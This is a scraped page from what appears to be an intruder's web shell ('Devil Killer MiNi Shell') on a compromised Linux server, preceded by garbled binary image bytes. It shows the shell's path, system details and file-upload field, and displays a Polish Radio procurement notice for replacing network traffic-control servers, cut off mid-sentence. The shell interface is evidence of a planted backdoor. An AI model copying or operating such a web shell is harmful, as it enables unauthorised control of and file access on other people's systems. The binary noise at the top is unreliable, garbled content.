JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211104/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211104/0025781201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wymiana urządzeń sterowania ruchem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Polskie Radio - Spółka Akcyjna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010420591</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Niepodległości 77/85</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-977</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 6459791</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@polskieradio.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.prsa.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Działalność polegająca na produkcji programów wraz z ich nadawaniem </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wymiana urządzeń sterowania ruchem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-990a6da2-3d78-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00257812</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://polskieradio.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://polskieradio.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3.1. Postępowanie prowadzone jest w języku polskim wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu art. 2 pkt 4) ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, tj.: elektronicznej Platformy Przetargowej Polskiego Radia S.A. (dalej zwana: „Platformą”), o której mowa w pkt. 1.3 SWZ, dostępnej pod adresem: https://polskieradio.logintrade.net Niniejsze postępowanie znajduje się w <br/>wykazie postępowań prowadzonych przez Zamawiającego zamieszczonym na Platformie pod adresem: https://polskieradio.logintrade.net/rejestracja/ustawowe.html.<br/>3.2 Komunikacja ustna, telefoniczna dopuszczalna jest jedynie w odniesieniu do informacji, które nie są istotne, tj. w przypadku konieczności uzyskania informacji technicznych lub porządkowych związanych z prowadzonym postępowaniem. Treść i przebieg rozmów będzie dokumentowany przez Zamawiającego. W pozostałych przypadkach, w szczególności, gdy konieczne jest uzyskanie informacji min. na temat ogłoszenia o zamówieniu, dokumentów zamówienia oraz ofert, wymagane jest korzystanie z Platformy. Z wyjątkiem wskazanym w pierwszym zdaniu Platforma służyć będzie do wymiany wszelkich pism, zawiadomień i informacji związanych z niniejszym postępowaniem, w szczególności wyjaśnień treści SWZ, modyfikacji treści SWZ, wezwań <br/>do uzupełnienia dokumentów lub złożenia wyjaśnień, informacji dotyczących dokonania poprawy omyłek, zawiadomień dotyczących wyboru oferty najkorzystniejszej, informacji dotyczących przedłużenia terminu związania ofertą i innych wymaganych ustawą.<br/>3.2. Użytkowanie Platformy jest bezpłatne. <br/>3.3. Przeglądanie postępowań, pobieranie dokumentów, składanie wniosków o wyjaśnienie treści SWZ, składanie ofert nie wymaga rejestracji, ani logowania na Platformie.<br/>3.4. W niniejszym postępowaniu, Zamawiający zaleca rejestrację oraz logowanie, co najmniej przy składaniu oferty, wyjaśnień, dokumentów lub oświadczeń w odpowiedzi na wezwania Zamawiającego, kierowane w toku badania i oceny ofert.<br/>3.5. Rejestrując się albo logując wykonawcy, akceptują warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie: <br/>https://polskieradio.logintrade.net/rejestracja/regulamin.html. <br/>3.6. Szczegółowe zasady korzystania z Platformy, w tym wymagania sprzętowo – techniczne umożliwiające korzystanie z Platformy, szczegółowy sposób składnia, zmiany i wycofania ofert, przekazywania oświadczeń, dokumentów, w tym dopuszczalne formaty danych, w których możliwe jest przesyłanie plików zostały określone w Instrukcji korzystania Platformy Przetargowej Polskiego Radia S.A., stanowiącej Załącznik nr 7 do SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że będzie przetwarzał dane osobowe uzyskane w trakcie postępowania, w szczególności dane osobowe ujawnione w ofertach i<br/>załącznikach do ofert lub w dokumentach i oświadczeniach składanych w postępowaniu oraz dane osobowe uzyskane w trakcie realizacji umów.<br/>2. Administratorem danych osobowych, o których mowa w pkt.1, jest Zamawiający – Polskie Radio S.A. w Warszawie; adres: 00-977 Warszawa, al. Niepodległości 77/85. W sprawach związanych z danymi osobowymi, o których mowa w pkt 1, należy kontaktować się z Inspektorem Ochrony Danych, adres e-mail: iod@polskieradio.pl, tel. 022 645 34 03.<br/>3. Dane osobowe, o których mowa w pkt.1, przetwarzane będą na podstawie art. 6 ust. 1 lit. c) oraz art. 6 ust. 1 lit. f) rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwanego dalej „RODO”, tj. z uwagi na fakt, że przetwarzanie danych osobowych jest niezbędne w celu wypełnienia obowiązku<br/>prawnego ciążącego na Administratorze i do celów wynikających z prawnie uzasadnionych interesów realizowanych przez Administratorów, związanych z realizacją umowy, z zastrzeżeniem pkt 4 i 5.<br/>4. Dane osobowe uzyskane w trakcie postępowania, dotyczące wyroków skazujących, naruszeń prawa lub powiązanych środków bezpieczeństwa, w szczególności dane osobowe ujawnione w dokumentach i oświadczeniach składanych w postępowaniu, o których mowa w pkt. 1, udostępniane będą w celu<br/>umożliwienia korzystania ze środków ochrony prawnej o których mowa w Dziale IX ustawy Prawo zamówień publicznych z dnia 11 września 2019 r. (Dz. U. 2019 poz. 2019 ze zm.) do upływu terminu do ich wniesienia.<br/>5. Dane osobowe, o których mowa w pkt.1, są jawne z wyjątkiem danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz danych genetycznych, biometrycznych, danych dotyczących zdrowia, seksualności lub orientacji seksualnej, o których mowa w art. 9 ust. 1 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Pełna treść klauzuli informacyjnej została zawarta w pkt 26 SWZ - INFORMACJA O PRZETWARZANIU DANYCH OSOBOWYCH</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.B5.44.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wymiana klastra urządzeń fizycznych BIGIP 5050S Zamawiającego, poprzez dostawę i wdrożenie nowych serwerów sieciowych, mających zabezpieczyć sterowanie ruchem. Zamówienie będzie polegało na wykonaniu niezbędnych dostaw, instalacji i usług zgodnie z przedstawionymi w Opisie Przedmiotu Zamówienia (Załącznik nr 1 do SWZ) wymaganiami. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48821000-9 - Serwery sieciowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72265000-0 - Usługi konfiguracji oprogramowania</p> <p class="mb-0">72611000-6 - Usługi w zakresie wsparcia technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">21.1.	Zamawiający dokona oceny ofert oraz dokona wyboru oferty najkorzystniejszej spośród ofert spełniających wymagania określone w Załączniku nr 1 do SWZ – Opis przedmiotu zamówienia, w oparciu o następujące kryteria: <br/><br/>„C – cena oferty” – maksymalna liczba punktów, którą może uzyskać oferta w tym kryterium to 80 pkt. <br/><br/>W tym kryterium zostanie zastosowany wzór: <br/>C = (Cmin / Cb) x 80<br/>gdzie,<br/>C – ilość punktów uzyskanych przez ofertę w kryterium cena<br/>Cmin – cena najniższa spośród badanych ofert <br/>Cb – cena badanej oferty <br/><br/>„F – funkcjonalność urządzeń” – liczba punktów, którą może uzyskać oferta w tym kryterium to 20 pkt. <br/><br/>Punkty będą przyznawane ofertom oferującym urządzenia obsługujące język programowania TCL. <br/><br/>21.2.	Oferta może maksymalnie uzyskać 100 punków. Ilość punktów uzyskanych przez ofertę będzie obliczona jako suma punktów uzyskanych w poszczególnych kryteriach. <br/>21.3.	W oparciu o powyższe kryteria zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Za najkorzystniejszą zostanie uznana oferta, która uzyska największą liczbę punktów. W przypadku braku możliwości wyboru oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans „ceny oferty” i kryterium „funkcjonalność urządzeń” (tj. uzyskałaby taką samą liczbę punktów), Zamawiający spośród tych ofert wybierze ofertę̨ która otrzymała najwyższą ilość punktów w kryterium „cena oferty”. W przypadku braku możliwości wyboru oferty najkorzystniejszej, ze względu na to, że uzyskały one taką samą ilość punktów w kryterium „cena oferty”, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w terminie wyznaczonym przez Zamawiającego ofert dodatkowych zwierających nowe ceny. <br/>21.4.	W przypadku złożenia oferty, której wybór prowadziłby do powstania obowiązku podatkowego Zamawiającego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi przepisami.<br/>21.5.	Zamawiający nie przewiduje wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Funkcjonalność urządzeń</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej dwa zamówienia (rozumiane jako dwie odrębne umowy) polegające na dostawie i wdrożeniu (implementacji) serwerów sieciowych sterujących ruchem o wartości minimum 700.000,00 zł brutto każda, przy czym wskazany okres trzech lat, w którym zamówienia mają zostać wykonane, liczony będzie w latach wstecz, od dnia, w którym upływa termin składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">12.4.	Przed wyborem oferty najkorzystniejszej, Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona do złożenia w terminie nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących dokumentów: <br/>12.4.1.	oświadczenia wykonawcy, w zakresie określonym w art. 10.1.5 SWZ [w art. 108 ust. 1 pkt 5) ustawy], o braku przynależności z innym wykonawcą, który złożył ofertę <br/>w niniejszym postępowaniu do tej samej grupy kapitałowej w rozumieniu ustawy <br/>z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, a w przypadku zaistnienia ww. okoliczności – oświadczenia o przynależności z innym wykonawcą, który złożył ofertę w niniejszym postępowaniu do tej samej grupy kapitałowej i dokumentów lub informacji potwierdzających przygotowanie oferty niezależnie od ww. innego wykonawcy. Wzór oświadczeń zawiera Załącznik nr 4 do SWZ,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">12.4.	Przed wyborem oferty najkorzystniejszej, Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona do złożenia w terminie nie krótszym niż 5 dni, aktualnych na dzień złożenia następujących dokumentów: <br/>12.4.2.	wypełniony wykaz wykonanych zamówień, sporządzony zgodnie ze wzorem stanowiącym Załącznik nr 5 do SWZ, zawierający informacje na temat wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których zamówienia, wskazane w wykazie, zostały wykonane oraz załączeniem dowodów, określających czy zamówienia zostały wykonane należycie, przy czym dowodami są: <br/>12.4.2.1.	referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego zamówienia były wykonane, <br/>12.4.2.2.	oświadczenie Wykonawcy – jeżeli z przyczyn niezależnych od niego nie jest w stanie uzyskać dokumentów, o którym mowa w pkt 12.4.2.1. <br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji zamówień wykonywanych wspólnie z innymi wykonawcami, wykaz o którym mowa w pkt 12.4.2. musi dotyczyć wyłącznie zamówień, w których wykonaniu wykonawca bezpośrednio uczestniczył;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 12.2.	W celu potwierdzenia, że oferowany sprzęt spełnia wymagania określone w Załączniku nr 1 do SWZ oraz w celu potwierdzenia, że oferowany sprzęt posiadania cechy określone w kryterium oceny ofert „F-funkcjonalność urządzeń” i (o ile zostaną zaoferowane) wykonawcy wraz z ofertą zobowiązani są złożyć producencką dokumentację techniczną oferowanych urządzeń. <br/>Zamawiający zaakceptuje równoważne przedmiotowe środki dowodowe, jeśli potwierdzą one, że oferowane dostawy spełniają określone przez Zamawiającego wymagania oraz deklarowane w ofercie funkcjonalności.<br/>Zamawiający dopuszcza, by przedmiotowy środek dowodowy został złożony w języku angielskim. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 12.3.	Składając ofertę, poza oświadczeniami i dokumentami, o których mowa w pkt 12.1 i pkt 12.2, wykonawcy zobowiązani są przedłożyć:<br/>12.3.1.	wypełniony formularz oferty – wg wzoru stanowiącego Załącznik nr 2 do SWZ,<br/>12.3.2.	dowód wniesienia wadium – w przypadku wnoszenia wadium w innej formie niż wskazana w pieniądzu,<br/>12.3.3.	pełnomocnictwo– w przypadku, gdy:<br/>12.3.3.1.	wykonawca ustanawia pełnomocnika (pełnomocników) do reprezentowania go w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego; <br/>12.3.3.2.	w sytuacji określonej w pkt 11.3 – podmiot udostępniający zasoby ustanawia pełnomocnika (pełnomocników) do reprezentowania go w postępowaniu,<br/>12.3.3.3.	ofertę składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia. <br/>W pełnomocnictwie należy określić zakres umocowania. Pełnomocnictwo musi być podpisane przez osoby uprawnione do reprezentacji mocodawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 16.1.	Oferta powinna być zabezpieczona wadium w wysokości: 13 000 zł (słownie: trzynaście tysięcy złotych 00/100). <br/>16.2.	Wadium wnosi się przed upływem terminu składania ofert w następujących formach (w zależności od wyboru wykonawcy):<br/>16.2.1.	pieniądzu, wpłaconym na konto: Polskie Radio S.A. (PKO BP S.A.) <br/>nr: 95 1020 1026 0000 1002 0298 1389; <br/>16.2.2.	gwarancjach bankowych; <br/>16.2.3.	gwarancjach ubezpieczeniowych;<br/>16.2.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości .<br/>16.3.	W przypadku wnoszenia wadium w formie wskazanej w pkt. 16.2.1 (w pieniądzu) terminem wniesienia wadium jest data i godzina uznania rachunku bankowego Zamawiającego (zaksięgowania wymaganej kwoty wadium na rachunku bankowym Zamawiającego).<br/>16.4.	W przypadku wnoszenia wadium w formie gwarancji/ poręczenia, wskazanych w pkt 16.2.2. – 16.2.4., wymagane jest załączenie do oferty za pośrednictwem Platformy, o której mowa w pkt 3.1., oryginału dokumentu gwarancji/ poręczenia w postaci elektronicznej, podpisanego kwalifikowanym podpisem elektronicznym osób upoważnionych do jego wystawienia ze strony gwaranta/ poręczyciela, tj. wystawcę gwarancji/poręczenia. <br/>16.5.	Dokumenty gwarancji/poręczenia, należy załączyć na Platformie, w osobnym pliku oznaczonym „Wadium”, zgodnie z Instrukcją korzystania z Platformy stanowiącą Załącznik nr 7 do SWZ. <br/>16.6.	W przypadku wnoszenia wadium w formie gwarancji bankowej bądź ubezpieczeniowej, albo w formie poręczenia, koniecznym jest, aby:<br/>16.6.1.	gwarancja/poręczenie obejmowały odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę, określone w art. 98 ust. 6 ustawy,<br/>16.6.2.	gwarancja/poręczenie obejmowała cały okres związania ofertą określony w SWZ, poczynając od dnia składania ofert,<br/>16.6.3.	gwarancja/poręczenie zawierały klauzulę o gwarantowaniu wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie Zamawiającego,<br/>16.6.4.	z treści gwarancji/poręczenia jednoznacznie wynikało zobowiązanie gwaranta/poręczyciela do zapłaty całej kwoty wadium,<br/>16.6.5.	w treści gwarancji/poręczenia znalazła się nazwa oraz numer przedmiotowego postępowania oraz jednoznaczne wskazanie Polskiego Radia S.A. w Warszawie (adres: 00-977 Warszawa, al. Niepodległości 77/85), jako beneficjenta gwarancji/poręczenia,<br/>16.6.6.	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia poręczenie/gwarancja obejmowały swą treścią (tj. zobowiązanych z tytułu poręczenia lub 